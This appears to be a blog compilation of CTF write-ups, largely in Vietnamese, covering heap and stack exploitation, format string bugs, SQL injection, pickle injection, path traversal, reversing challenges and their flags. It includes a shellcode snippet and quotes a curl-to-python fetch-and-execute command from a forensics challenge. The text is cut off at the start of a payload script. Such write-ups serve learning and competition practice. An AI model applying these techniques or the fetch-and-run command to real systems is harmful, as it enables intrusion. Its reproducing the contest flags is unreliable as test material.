Deciphering Ceasar basic concept

Deciphering

 

Ciphertext: “VaqrprzoreoeratraWhyvhfraJnygreUbyynaqreqrgjrroebrefinaRqvguZnetbganne

NzfgreqnzNaarjvytenntzrrxbzraznnezbrgabtrrarragvwqwrovwbzn

oyvwiraBznmnyurgzbrvyvwxuroorabzNaarabtrracnnejrxraqnnegrubhqrafpuev

wsgRqvguSenaxvarraoevrsnnaTregehqAnhznaauhaiebrtrerohhezrvfwrvaSenaxs

hegnzZnva

The given ciphertext has only letters without space, punctuation or separated key, there are two classic cipher systems such as substitution cipher and transposition cipher which are known to be easy to attack by using frequency analysis or bruteforce techniques. Continue reading Deciphering Ceasar basic concept

[Whitehat GrandPrix 2015] Writeup

Pwn200:

ASLR tắt, bug cho phép ghi đè 2 byte vào địa chỉ char *buf = malloc(20);. Với ASLR tắt thì địa chỉ map của [heap] section sex fix ở dạng 0x0804xxxx, do đó ta có thể điều khiểu *buf = got_table một cách dễ dàng. Phương pháp khai thác như sau:

 • Ghi đè free's got = trở lại phần read để đọc > 40 bytes => stack overflow.
 • Ghi đè strtoimax's = địa chỉ lệnh ret
 • Ghi đè memcpy => leave;ret => tiến hành trigger buffer overflow khi trở lại hàm read để đọc > 40 bytes. Ngoài ra do ASLR tắt nên địa chỉ map của libc luôn fix, nên công việc còn lại chỉ là bruteforce libc base addr.

Mã khai thác: https://gist.github.com/peternguyen93/f4e9bf786c2df2ab968f

Pwn300:

Lỗ hổng stack base buffer overflow rất rõ ràng khi sử dụng hàm gets(buf), do binary được compiled 32 bit do đó ta có thể control địa chỉ flag và đọc được bất cứ dữ liệu nào của memory

void find_flag(char *flag)
{
  char buf[256];
  make_flag(flag); //đổi flag
  while(1){
    gets(buf);
    printf("%s%s\n",buf,flag);
  }
}

Mã khai thác

https://gist.github.com/peternguyen93/e187ad6cee83346298ce

Pwn500:

Binary sử dụng các kỹ thuật anti-debug và cấm sử dụng các syscall (execve,fork,clone). Ngoài ra lỗ hổng buffer overflow khá là rõ ràng, binary được compile bằng PIE. Tuy nhiên, hàm read không tự động viết null bye vào cuối, do đó ta có thể leak được canary và libc_base , thông qua các bước sau:

 • Leak canary.
 • Ghi đè địa chỉ return address về main
 • Leak libc_start_main => libc_base
 • Tiến hành sử dụng rop chain để build mã đọc flag và trả về.

https://gist.github.com/peternguyen93/c4dda7ef5dd7cb549a2f

Web100:

SQL Injection, do chưa filter đấu '\'. Ngoài ra trước khi hết thúc xử lý request, web100 gọi hàm re.findall(r'(y+)*',row), hàm regex findall match tất cả các substring có thể match, ngoài ra chuỗi regex (y+)* với một chút google ta có kq sau https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS , đo đó có thể build một query cho phép ta có thể phân biệt được trạng thái đúng hoặc sai để blind flag dựa trên time base.

https://gist.github.com/peternguyen93/75839e252257e9da62e4

Web200:

Lỗ hỗng rất rõ ràng khi web app sử dụng pickle data serialization, thông qua đó ta có thể sử dụng code injection để có được shell trên server.

https://gist.github.com/peternguyen93/c168c15919a3203acfe2

Web300:

Lỗi LFI cho phép có thể lấy được mã nguồn của website, trong đó thấy được một script cgi lấy thông tin về thời gian. Script này bị lỗi command injection, do giới hạn các hàm connect back, để get shell ta lợi dụng file /run/cgicounter ta có thể đọc từng ký tự của command trả về.

https://gist.github.com/peternguyen93/0c34bc33d99ff71593a7

CSAW 2015 CTF All Exploitable Solutions (Script only)

I'm too lazy to write up in deep these challenges, but i will give you my solution to solve these challenges. You will do it by yourself before you read my exploit script, that makes you understand deeper. I hope you enjoy with this. Happy pwnning.

1119

[Write up] DEFCON CTF 2015 - wwtv , cybergrandsandbox

WWTV

The bug is easy to find at function Coordidate, this is basic format string bug

But before you enter printf(s), we must to bypass the check a pair float number is parsed from s, to bypass it we just append format string bug to the end of the pair '51.492137,-0.192878' , for more information about atof read this http://www.cplusplus.com/reference/cstdlib/atof/

So the payload to exploit this bug too easy:

 1. First, we need to leak binary base address, and libc address
 2. Second, calc system address and then overwrite atof got by system address and then pwned.

But the game is not over, before we exploit the bug, we need to solve 2 problems:

We must to write a program to solve the game to enter TARDIS mode (this task is to quite strange)

We must bypass timecheck to enter vulnerable function

time_c > 0x55592B6C && time_c <= 0x55592B7F;

We must set time_c in range (0x55592b6c,0x55592b7f].

Take a look at READ_DATA function , will be triggered after 2 second.

OMG, the buffer was used for saving the connection to localtime server was used to store user input. We just send 9 zero bytes to server and then wait until READ_DATA is triggered and then send 4 bytes in require range, and we will enter vulnerable function.

Our poc here : https://gist.github.com/peternguyen93/f06aa5e27626598a1c21

CyberGrandSandbox

This is very interesting challenge.

After doing RE we find some usefull information:

This program implementing basic Polish Notation by using JIT compiler.

The structure of jit is:

Take a look at function handle_digit 

When we inputted a string of number is seperated by space character , the jit compiter will push it in the stack_buffer.

We know that size of stack_buf is 0x1000 (located below stack_code), in this function there are no unbound checking if we push the stack_buf into stack_code, and so this bug does.

We just write own shellcode and then overwrite some opcode in the end of asm_code with own shellcode  (because cgc executable is not have sys_execve syscall so we just use some syscall provided by CGC to read the flag).

Our shellcode :

_start:
	push 0x3
	pop eax
	push ebx
	pop ecx
	push 0x3
	pop ebx
	push 0x50
	pop edx ;ebx hold my buffer
	int 0x80
	push 0x2
	pop eax
	push 0x1
	pop ebx
	int 0x80

Our poc is : https://gist.github.com/peternguyen93/e7d08cf109b38af6baae

This is the first time i wrote writeup using english, if something went wrong or some point you dont understand, feel free to ask me above

ASIS Quals CTF 2015 - grids, keka-bomb, dump Writeup

Programming 300 - grids

Đề bài nhận được là cho 1 tập hợp điểm trên mặt phẳng 2D, cần tìm diện tích đa giác lớn nhất tạo được mà các đỉnh của đa giác được lấy từ tập hợp điểm đã cho. Dễ thấy là đa giác cần tìm cần bao trọn toàn bộ tập điểm, nên bài toán quy về việc tính diện tích bao lồi của tập điểm này.

Có thể dùng thuật toán quét Graham để tìm bao lồi sau đó dùng công thức tính diện tích của Gauss để tính diện tích đa giác vừa tìm được. Nhưng trong SciPy đã có code tìm bao lồi nên mình không cần phải code lại phần bao lồi nữa :))

Code của mình (mình k biết chèn gist vào đây như thế nào :<):

from scipy.spatial import ConvexHull
import numpy as np
import ast
import telnetlib
import re
 
class Telnet(telnetlib.Telnet):
  # inherit from Telnetlib and add new method
  def __init__(self,host,port):
    telnetlib.Telnet.__init__(self,host,port)
  # make easier when you want to send raw data to server
  def writeRawData(self,data):
    return self.get_socket().send(data)
 
  def recvRawData(self,size):
    return self.get_socket().recv(size)
 
# Calculate algebraic area of a polygon using shoelace formula
def area(vertices):
  n = len(vertices)
  area = 0.0
  for i in range(n):
    j = (i + 1) % n
    area += vertices[i][0] * vertices[j][1]
    area -= vertices[j][0] * vertices[i][1]
  area /= 2.0
  return area
 
host = '217.218.48.84'
port = 12432
 
# connect
tel = Telnet(host, port)
s = tel.read_until('Are you ready for this challenge?\n')
print s,
# reply
print 'yes'
tel.writeRawData('yes\n')
s = tel.read_until('OK, OK, lets start\n')
print s,
# solve
for i in range(99):
  print '[*] %d-th round' % i
  s = tel.read_until("What's the area?")
  print s,
  l = np.array(ast.literal_eval(re.findall(r'\n(

.*

)\n', s)[0])) hull = ConvexHull(l) vertices = l[hull.vertices] res = abs(area(vertices)) print res tel.writeRawData(str(res)+'\n') # get flag tel.interact()

Flag là

ASIS{f3a8369f4194c5e44c03e5fcefb8ddf6}

Forensics 75 - Keka Bomb

File đã cho là một file 7z và bên trong nó gồm nhiều file 7z con với dung lượng mỗi file khoảng 4GB : 0009.7z -> 0000007.7z -> 0000000008.7z -> bomb_8, mở file này bằng HxD, tìm chuỗi "ASIS" sẽ thấy flag:

ASIS{f974da3203d155826974f4a66735a20b}

Forensics 250 - Dump
File trong đề là 1 file .sav của VirtualBox nhận được khi tạo snapshot hoặc suspend máy ảo. File chỉ chứa một phần RAM đã được sử dụng và được sắp xếp theo một trật tự không nhất định nên (theo quá trình Google của mình) không thể lấy trực tiếp thông tin trên đây được :<, mà cần phải chạy file .sav trên VirtualBox rồi tạo core dump hoặc memdump sau đấy mới phân tích được.

Mình đã tạo một máy ảo VirtualBox với hệ điều hành là Ubuntu x64, để ổ cứng kết nối ở IDE Primary Master, card mạng là Am79C973, RAM là 128MB. Sau đó mình boot máy ảo này, suspend nó, rồi ghi đè file đã cho vào file .sav được VirtualBox tạo ra. Sau đó khi khởi động lại, mình vào được trạng thái đang lưu trong file .sav với hệ điều hành là Tiny Core Linux:

asis_dump

Ở trong lịch sử dòng lệnh, có một lệnh là

python -c "$(curl -fSsL http://a.asis.io/0QnqZU9F)"

Lệnh này down 1 file .py từ server và thực hiện file này. Mình đã không quan tâm đến nó trong khi đây chính là mấu chốt của bài toán :< (cảm ơn anh @yeuchimse đã chỉ cho em đoạn này :3).

Như vậy có khả năng file Python kia vẫn còn được lưu đâu đó ở trong RAM của máy ảo, vì vậy cần phải đọc được RAM và tìm kiếm đoạn 'Please enter the access key' vì khi chương trình được chạy có in ra dòng này. Trong quá trình thi, mình đã chạy VirtualBox trong một máy ảo VMware và dump RAM của máy ảo VMware để tìm trong đó :<. Tuy vậy có một cách đơn giản hơn là dùng HxD hoặc Cheat Engine. Sau khi tìm kiếm với chuỗi:

'Please enter the access key

, ta tìm được đoạn code:

memview

Đoạn code này yêu cầu nhập 1 chuỗi là key, và nếu key đúng sẽ in ra thứ gì đó. Thử xây dựng lại key từ file code tìm được, sau đó dùng key này để tìm chuỗi in ra:

import hashlib
 
# calculate key
key_ar = [0 for i in range(5)]
key_ar[0] = hex(58559604012647)[2:].decode('hex')
key_ar[1] = hex(27697077611219024)[2:].decode('hex')
key_ar[2] = hex(28839576914310229)[2:].decode('hex')
key_ar[3] = hex(14469853439423811)[2:].decode('hex')
key_ar[4] = hex(21189029315236706)[2:].decode('hex')
key = '-'.join(key_ar)
 
# original code
# key = raw_input('Please enter the access key: ').strip()
if len(key) == 38:
  key_ar = key.split('-')
  if len(key_ar) == 5:
    if int(key_ar[0].encode('hex'), 16) == 58559604012647:
      if int(key_ar[1].encode('hex'), 16) == 27697077611219024:
        if int(key_ar[2].encode('hex'), 16) == 28839576914310229:
          if int(key_ar[3].encode('hex'), 16) == 14469853439423811:
            if int(key_ar[4].encode('hex'), 16) == 21189029315236706:
              print key[18] + key[-2] + chr(ord(key[26]) - 1) + key[-2] + '{' + hashlib.md5(key).hexdigest() + '}'
            else:
               print 'You access key is not correct! Banned!!'
          else:
            print 'You access key is not correct! Banned!!'
        else:
          print 'You access key is not correct! Banned!!'
      else:
        print 'You access key is not correct! Banned!!'
    else:
      print 'You access key is not correct! Banned!!'
  else:
    print 'You access key is not correct! Banned!!'
else:
  print 'You access key is not correct! Banned!!'

Sau khi chạy file trên, ta được flag:

ASIS{632253c69a6049594bc303f0af0042b8}

BackdoorCTF Writeup

backdoor CTF 2015: NONAME

Category: Exploit Points: 200 Author: Amanpreet Singh Difficulty: Solves: 25 Description:

Intrestingly enough, even though it was not expected, Chintu found a cool website to play with, though he can't get the flag. Can you? Visit this. Submit the SHA-256 hash of the flag obtained.

Gaylord : At first, (str (all-ns)) to get all namespaces. And then (clojure.repl/dir noname.people.admin) to see what inside. There is including flag and secret. Used (noname.people.admin/flag) to get the  a half of the flag.

Chuymichxinhdep: However secret is a private variable variable, I used ((noname.people.admin/secret)) to obtain the other half of the flag. Problem solved.

backdoor CTF 2015: QR

Category: Misc Points: 70 Author: Abhay Bir Singh Rana Difficulty: Easy Solves: 84 Description:

Decode some QR codes at nc hack.bckdr.in 8010

 

chuymichxinhdep:

from subprocess import Popen, PIPE
i = 0
import socket

sock = socket.socket()
sock.connect(("hack.bckdr.in", 8010))
s= sock.recv(1024)
print(s)
while True:
	i=i+1
	string = ""
	s= sock.recv(65535)
	data= s.replace("\x20\x20","0").replace("\xe2\x96\x88\xe2\x96\x88","1")
	file = open('qr','w')
	for line in data.split("\n"):
		string = string+line[1:len(line)-1]+"0"*(47-len(line))+"\n"
	file.write(string[46:len(string)-1-46])
	file.close()
	output = Popen(["python", "sqrd.py", "qr"], stdout=PIPE).communicate()[0]
	print i, output.strip()
	sock.send(output.strip())

Convert the QR to binary only and use Strong QR to decode. After 50 submissions we've got the flag.

backdoor CTF 2015: RAPIDFIRE

Category: Misc Points: 500 Author: Amanpreet Singh Difficulty: TODO Solves: 0 Description:

I am enjoying it really. Are you? nc hack.bckdr.in 8007. Submit the SHA-256 hash of the flag obtained.

Chuymichxinhdep: Just use a brilliant source code from gaylord.

import socket, hashlib, time, requests
from geopy import GoogleV3
import re
import shelve
import omdb

host = '128.199.107.60'
port = 8008
rep_countrycode = False

def fib(n):
  i = h = 1
  j = k = 0
  while (n > 0) :
    if (n%2 == 1) : # when n is odd
      t = j*h
      j = i*h + j*k + t
      i = i*k + t
    t = h*h
    h = 2*k*h + t
    k = k*k + t
    n = int(n/2)
  return j

def get_country(place_name):
  gapi = shelve.open('googly_cache', writeback=True)
  try:
    wat = place_name.encode('base64')
  except UnicodeEncodeError:
    wat = u' '.join(place_name).encode('utf-8').strip().encode('base64')
  if (wat in gapi):
    print('[*] Found in shelf')
    loc = gapi[wat]
  else:
    print('[*] Request from GGAPI')
    loc = geolocator.geocode(place_name).raw
    gapi[wat] = loc
    gapi.sync()
  gapi.close()
  for comp in loc['address_components']:
    if 'country' in comp['types']:
      if rep_countrycode:
        return comp['short_name'] # TODO: not short_name but something else
      else:
        return comp['long_name']

def get_release(movie_name):
  gapi = shelve.open('moviee_cache', writeback=True)
  try:
    wat = movie_name.encode('base64')
  except UnicodeEncodeError:
    wat = u' '.join(movie_name).encode('utf-8').strip().encode('base64')
  if (wat in gapi):
    print('[*] Found in shelf')
    loc = gapi[wat]
  else:
    print('[*] Request from OMDB')
    s = omdb.title(movie_name)
    loc = s['year']
    gapi[wat] = loc
    gapi.sync()
  gapi.close()
  return loc
  
def read_until(wat):
  buf = ''
  while not (wat in buf):
    buf += sock.recv(1)
  return buf
  
def read_for_fun(sz):
  d = ''
  while (sz > 0):
    tmp = sock.recv(sz)
    sz -= len(tmp)
    d += tmp
  return d

# init connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
geolocator = GoogleV3()
pii = requests.get('http://www.angio.net/pi/digits/pi1000000.txt').text
# read & answer
while True:
  s = sock.recv(8192)
  if ('code is in CAPS' in s): rep_countrycode = True
  if (s == ''): sleep(10)
  print(s)
  n = 'wat'
  res = n
  if ('sum' in s):
    n = int(re.findall(r'first\ (\d+)\ ', s)[0])
    if ('odd' in s):
      res = n * n
    elif ('fibonacci' in s):
      res = fib(n+2) - 1
    elif ('natural number' in s):
      res = (n * (n + 1) // 2)
    res = str(res)
  elif ('prime' in s):
    n = int(re.findall(r'the\ (\d+)(st|nd|rd|th)', s)[0][0]) + 1
    n = str(n)
    page = requests.get('http://numbersofprime.com/prime/' + n)
    res = re.findall(r'

([\d,]+)

', page.text)[1] res = res.replace(',', '') res = res.strip() elif ('md5' in s): n = re.findall(r'of\ (.*)\n', s)[0] res = hashlib.md5(n).hexdigest() elif ('pi' in s): n = int(re.findall(r'the\ (\d+)(st|nd|rd|th)', s)[0][0]) res = pii[n+1] elif ('fibonacci' in s): n = int(re.findall(r'the\ (\d+)(st|nd|rd|th)', s)[0][0]) res = str(fib(n)) elif ('binary' in s): n = int(re.findall(r'of\ (\d+)\ in', s)[0]) res = bin(n)[2:] elif ('country' in s): n = re.findall(r'of\ (.*)\n', s)[0] res = get_country(n) elif ('release year' in s): n = re.findall(r'of\ (.*)\n', s)[0] res = get_release(n) print '[*] n = ', n print '[*] res = ', res sock.sendall(res+'\n')

 

I added pycountry to get the alpha-2 code of country. After 199 submissions we will get the flag. Not a fun challange because of slow server and too many stupid questions.

-chuymichxinhdep.

phd

BabyPhD.

[Whitehat Contest 8] Pwn200,Pwn500 Writeup

Phân tích code, binary là một simple webserver , nhận request từ client và trả về dữ liệu cần yêu cầu, hỗ trợ (GET/HEAD)

Chú ý 2 đoạn code sau

Screen Shot 2015-02-01 at 9.22.05 PM

Nhận path request , tiến hành urldecode rồi open cái file html/js/... mà client yêu cầu, sau đó trả về content.

Kiểm tra hàm CleanURL

Screen Shot 2015-02-01 at 9.22.44 PM

Hàm có tác vụ urldecode, tuy nhiền hàm này lại không filter '../' (path traveler) cho phép attacker có thể sử dụng '../' để read /etc/passwd (hoặc flag) chẳng hạn

Screen Shot 2015-02-01 at 9.18.50 PM

Screen Shot 2015-02-01 at 9.19.00 PM

[HackIM 2014] RE + Pwn MentalNote

RE 100 - boo

binary khá nặng

C:\Users\chim\Desktop\nullcon\re\boo>trid boo

TrID/32 - File Identifier v2.10 - (C) 2003-11 By M.Pontello

Collecting data from file: boo
100.0% (.) Mac OS X Mach-O 64bit Intel executable (4000/1)

=> Mac OS Binary kernel Mach 64 bit

Check string 1 tí thì thấy UPX 3.91!. Ok thử decompress nào

C:\Users\chim\Desktop\nullcon\re\boo>upx -d boo
            Ultimate Packer for eXecutables
             Copyright (C) 1996 - 2013
UPX 3.91w    Markus Oberhumer, Laszlo Molnar & John Reiser  Sep 30th 2013

    File size     Ratio   Format   Name
  --------------------  ------  -----------  -----------
upx: boo: NotPackedException: not packed by UPX

Unpacked 0 files.

Failed!

Check lại string lần nữa để ý thấy cái zlib.so, struct.so, python ME... nghi ngờ thể loại python->bin quá.

Find header PYZ => founded :yolo:

boo_3

Ok easy roài, extract data python ra thôi - Link

import sys

if len(sys.argv) == 13:
	print "Great: flag{g3771ng_st4rt3d_2015}"
else:
	print "."

-------------------------------------------------------------------------------------------------------

RE 200 - upx.exe

string thử chả thấy cái UPX! signature nào @@. decompress lại cho chắc failed nốt.

upx_1

Run

upx_2

OK boy let's make it nicely!

Bật IDA Disass thấy đây là 1 binary MS C++ bình thường.

main là winMain -> sau đó call hàm sub_4001000

int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
  sub_401000();
  return 0;
}

void *__cdecl sub_401000()
{
  void *result; // [email protected]
  void *MZ_header; // [email protected]
  int v2; // [email protected]
  int v3; // [email protected]
  int v4; // [email protected]
  int v5; // [email protected]
  const char *v6; // [email protected]
  unsigned int v7; // [email protected]
  int v8; // [email protected]
  HANDLE v9; // [email protected]
  void *v10; // [email protected]
  unsigned int v11; // [email protected]
  HANDLE v12; // [email protected]
  int v13; // [email protected]
  SIZE_T v14; // [sp+0h] [bp-28h]@1
  int v15; // [sp+4h] [bp-24h]@14
  int v16; // [sp+8h] [bp-20h]@14
  int v17; // [sp+Ch] [bp-1Ch]@14
  int v18; // [sp+10h] [bp-18h]@14
  int v19; // [sp+14h] [bp-14h]@14
  SIZE_T v20; // [sp+18h] [bp-10h]@14
  int v21; // [sp+1Ch] [bp-Ch]@14
  int v22; // [sp+20h] [bp-8h]@14
  int v23; // [sp+24h] [bp-4h]@14

  result = GetModuleHandleW(0);
  MZ_header = result;
  v14 = (SIZE_T)result;
  if ( result )
  {
    result = (void *)'ZM';
    if ( *(_WORD *)MZ_header == 'ZM' )
    {
      result = (char *)MZ_header + *((_DWORD *)MZ_header + 15);
      if ( *(_DWORD *)result == 'EP' )
      {
        v2 = *((_WORD *)result + 10);
        v3 = *((_WORD *)result + 3);
        v4 = 0;
        v5 = (int)((char *)result + v2 + 24);
        if ( v3 > 0 )
        {
          v6 = (char *)result + v2 + 24;
          while ( 1 )
          {
            result = (void *)strcmp(v6, ".reloc");
            if ( !result )
              break;
            ++v4;
            v6 += 40;
            if ( v4 >= v3 )
              return result;
          }
          v7 = *(_DWORD *)(v5 + 40 * v4 + 16);
          v8 = v5 + 40 * v4;
          v9 = GetProcessHeap();
          result = HeapAlloc(v9, 8u, v7 + 1);
          v10 = result;
          if ( result )
          {                      // malloc, copy hex sang cho malloc 6600
            unknown_libname_41(result, v14 + *(_DWORD *)(v8 + 12), *(_DWORD *)(v8 + 16));
            v11 = 0;
            if ( v7 )
            {
              do
                *((_BYTE *)v10 + v11++) ^= 0x11u;
              while ( v11 < v7 );
            }
            v14 = *(_DWORD *)v10;
            v12 = GetProcessHeap();
            result = HeapAlloc(v12, 8u, v14);
            v13 = (int)result;
            if ( result )
            {
              result = (void *)sub_406660((int)((char *)v10 + 4), (int)result, v7 - 4, (int)&v14);
              if ( !result )
              {
                v18 = 0;
                v15 = 0;
                v16 = 0;
                v17 = 0;
                v21 = 0;
                v22 = 0;
                v23 = 0;
                v20 = v14;
                v19 = v13;
                LOBYTE(v18) = 1;
                sub_401B60((int)&v15);
                ExitProcess(1u);
              }
            }
          }
        }
      }
    }
  }
  return result;
}

đầu tiên nó gọi hàm getModuleHandle để tìm base address của MZ Header
sau đó check MZ signature và PE signature ::for sure::

upx_3

find session .alloc

upx_4upx_6

var A = heapalloc(0x6600)

đến đoạn unknown_libname_41 này vì mình rất ghét cái gì cứ dấu giếm, và 1 phần nhác trỗi dậy. function thông thường của mscrt thôi nên xem các tham số truyền vô và kết quả trả về để đoán vậy (memcpy)

memcpy(0x41b00, A, 0x6600)
for i in range(0x6600):
	A[i] ^= 0x11

*một đoạn memory khá dài, lại còn bị mã hóa nữa. không thể nào là flag cipher được? Có lẽ nào là shellcode?

new_size = *(dword*)A = 0xbe00
var B = heapalloc(new_size)
sub_406660( &new_size ) => copy MZ_Header -> đến B, size = 0xbe00

upx_5

Từ đây ta nhảy vào sub func cuối là sub_401b60

Check các sub phụ, để ý các string mình thấy rất là liên quan

[+] Mapping PE file
[+] Creating Map View of File
[+] Map View of File created
[+] Checking for self relocation
[+] MyBase, MySize ?!?
[+] Jumping to relocated image
[+] Processing IAT
[+] Loading Library and processing
[+] Fixing Image Base address in PEB
[+] Executing Entry Point !!!

và 1 số function khá vãi

- CreateFileMappingW
- MapViewOfFile
- VirtualAlloc
- GetProcAddress
- VirtualQuery
- LoadLibraryA
- VirtualProtect

oke, tít đi ít! run shellcode chắc roài ::bem::

ta đặt breakpoint ở ngay các sub con và run lần lượt đến khi nào shell được chạy thì phát hiện điểm G

upx_7

sub_401b60 -> sub_401600 -> call eax
new entry point = 08001563

sài HxD (hex editor) view ram process upx.exe tại địa chỉ đó thì thấy nguyên session từ 0x08000000 -> 0x0800FFFF là 1 file PE mới,

search string thì thấy có dòng "You didn't ask nicely" và đặc biệt là "-pl34se-give-me-th3-k3y" :-ss

tới đây các bạn có thể extract ra 1 file exe mới và disass nghiên cứu (ko chắc là sẽ chạy đc ok), còn mình thì thấy nó có dạng 1 file ms c++ nữa nên so sánh structure với cái PE gốc để tìm addr winMain

địa chỉ 0x08001100

quá trình dịch cũng tương tự, bài mới này cũng không quá khó.

st = command_line_string
st[len(st)-1] = \x00

if st[len(st)]==\x20:
	if !strcmp(st, "-pl34se-give-me-th3-k3y"):
		func_flag()
		exit()
msgbox("You not nicely");

patch luôn cho lẹ, patch luôn chỗ strcmp và trong func_flag (0x08001000) có 1 chỗ gọi isDebuggerPresent (0x08001024)

upx_8

upx_9

Done.

----------------------------------------------------------------------------------

RE 400 - fin64

[email protected]:/media/sf_Desktop/nullcon/re/fin64$ file fin64
fin64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x9b62a9678a30ce6c576131024148154a0bc5575d, stripped

khi chạy và thử nhiều cách input, đều có kết quả "Not yet.."

[email protected]:/media/sf_Desktop/nullcon/re/fin64$ ./fin64
Not yet..

main khá ngắn, ta dịch lần lượt
để ý, có 2 cái good_boy và bad_boy trong hình

fin64_1

đầu tiên là func_systime
gọi syscall 0xc9 để lấy timestamp sao đó lưu giá trị vào [rbp-18h]

fin64_2

func_ctime - convert timestamp thành giá trị giây:phút:giờ:ngày:tháng:năm => lưu vào [rbp-10h]

fin64_3

dừng ở đây, jump ngược từ good_boy và bad_boy ta thấy có đoạn sử dụng [rbp-10h]

fin64_4

nếu [rbp-10h] ở không bị thay đổi thì đoạn code pseudo ntn:

[rbp-24h] = [dw_time+16]+1 = tháng
[rbp-20h] = [dw_time+12] = ngày
[rbp-1ch] = [dw_time+20] + 1900 = năm
if ( [rbp-24h] == 9 && [rbp-20h] == 10 && [rbp-1ch] == 2011 )
	good_boy
else
	bad_boy

thử đặt lại time là 10/9/2011 và run => still failed :wth:

giờ ta jump back từ đoạn compare trên đến ngay sau chỗ convert, patch những đoạn jump để bypass khoảng ở giữa và chạy lại 1 lần nữa

$ ./fin64
Oops..

Good bj, mình đoán flag nằm trong memory, thử trace dần vào good_boy

thì phát hiện ra cái này *byte_6c2070

fin64_5

next-challenge

--------------------------------------------------------------------------------------

RE 500 - cso

bài này thực sự không biết nên viết writeup như thế nào vì công nhận là nó khá bựa và cách làm cũng ngẫu hứng vãi nhái :3

sau hồi dịch mình chả biết nó là cái giống gì, có vẻ giống virtual machine nhưng cũng ko giống lắm =)), đại khái nó như này:

main:
	print(Bla bla bla)
	gets(st) #main input
	len_st = strlen(st)
	super = 0x24ae5af1 #first magic hex
	while True:
		A: 
			if super-a1>0: jump b1
		B: 
			if super-a2>0: jump b2
		C: 
			if super-a3>0: jump b3
		...
		V: 
			if super-an>0: jump bn
		X:
			super = a(n+1)
		Y:
			super = a(n+2)
		...
		Z:
			super = am
		quit:
			break
		dead: 
			puts("You are dead man")
			super = super_to_quit
			continue
		win: 
			puts("You are safe and live forever")
			super = super_to_quit
			continue
		check_len: 
			if len_st==0x1A: 
				super = super_to_stage2
			else:
				super = super_to_dead
			continue
		stage_2:
			#func_stage2 ở địa chỉ 0x00400ec0
			if func_stage2(st)==1: 
				super = super_to_win
			else:
				super=super_to_dead
			continue

#mấy số a1, a2, ...an, a(n+1), ... , am là magic const, ko biết có quy luật gì những mà nó đc build để tính toán hợp lí
#các jump b1, b2, b3, ... bn là nhãn của một trong mấy thằng A,B,C,...V, quit, dead, win, check_len, stage_2

			
def stage2(st):
	#cấu trúc đệ quy
	#vòng lặp tương tự main
	#có thêm 1 số sub function phụ

Không biết flag ở chỗ nào luôn, code follow control dựa vào mấy phép cộng của a(i), giờ tìm quy luật cho nó cũng đuối đơ. Có duy nhất 1 cái chắc chắn là len_st = 0x1A = 26 (!!!)

Sau nửa tiếng suy nghĩ, mình thấy khi input với len = 26 và len < 26 thì cảm giác debug lâu hơn. Suy nghĩ: Side channel dựa vào instruction count được không?

$ python -c "print 'a'*26" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123368

$ python -c "print 'a'*25" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123097

$ python -c "print 'a'*24" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123097

Bingo, chuẩn girl mất rồi, side channel bem lần lượt các char

import subprocess
import time

sam = "abcdefghijklmnopqrstuvwxyz"
sam += sam.upper()
sam += "0123456789_!,.{}"

#217826 SRRDRSSRSRRDDSSSRSSDSDDDSS

def insco(fl):
	fl += 'a'*(26-len(fl))
	open('hellyeah','wt').write(fl)
	subprocess.call("./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ../cso < hellyeah", shell=True)
	time.sleep(0.2)
	k = open("inscount.out").read().strip().split(' ')[1]
	print "-----", fl, k
	return int(k)

def dequy(fl):
	if len(fl)==26:
		print fl
		raw_input("<< Another result, enter for the next...")
	else:
		a = insco(fl + 'a')
		#Cho nay sample chi co 1 ki tu trong string "SRD" thoi (manual check), co the set sam = "SRD" side channel nhanh hon
		for c in sam:
			cou = insco(fl + c)
			if cou-a>400: dequy(fl + c)


dequy('')

=> Final SRRDRSSRSRRDDSSSRSSDSDDDSS. Không giống flag cho lắm :-ss

Input test lại vẫn "You are dead man". Wut dafuq, đúng quá rồi còn gì.
Check lại cái inscount thì thấy có sự chênh lệch rất lớn ins.
Có thể là những mini-sub trong stage2 (0x00400ec0)
Kiểm tra lần lượt từng mini-sub đó ta thấy có sub_400BD0 sử dụng biến global(s) chính là string input ban đầu?!?

cso_1

Đặt breakpoint ngay tại đó và input đúng như trên, sau 1 số lần trace thì ...

cso_2
Âu Mai Gót, call cái địa chỉ vừa trả về, không phải run shell thì là run cái gì nữa =))

Chuyển hướng sang disass con shell, tương tự 3 bài rồi

cso_3

move rất nhiều ASCII Char vào memory, ghép lại thì thấy đó là 1 chuỗi base32 😛

Hard time gone 😛

s = "MZWGCZ33NV4V6YZQNVYDINJVL4YTKX3VNYYXC5JTPU"
sam = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"

def tobin(t):
  st = bin(t).replace('0b','')
  st = '0'*(5-len(st)) + st
  return st

k = ''
for i in s:
  t = sam.find(i)
  print i, sam.find(i), tobin(t)
  k += tobin(t)

k = k[0:208]
print hex(int(k,2))[2:].replace('L','').decode('hex')

flag{my_c0mp455_15_un1qu3}

--------------------------------------------------------------------------------------

PWN 400 - Mental Note

bài này về cơ bản khá giống mixme

cấu trúc dữ liệu:

struct note{
	int size;
	note* next_note;
	note* prev_note;
	content[linh động]
}

và array_note[999] lưu địa chỉ con trỏ của mỗi note được thêm

có 3 loại note:

loại 0 : content 100 bytes
loại 1 : content 200 bytes
loại 2 : content 400 bytes

* add-note, người dùng nhập 1 loại note sau đó chương trình malloc 1 lượng bộ nhớ vừa đủ phần header+content size => new_note

new_note được insert vào array_note sau khi đã check-note (dựa vào note header) để tìm id phù hợp.

* edit-note, người dùng nhập id, loại note và read(note-id-content, size=note-type) mà ko check xem note ở id ấy có đúng loại không.
=> nếu note add vào là loại 0 mà khi edit với loại 1/2 thì sẽ overwrite được sang header note khác.

bằng cách này ta sẽ chỉnh phần header của note kế tiếp để khai thác lỗi check-note của add-note function.

Payload:

import socket, time

def send(s, m):
  print "[SEND]", m
  s.send(m)

def recv(s):
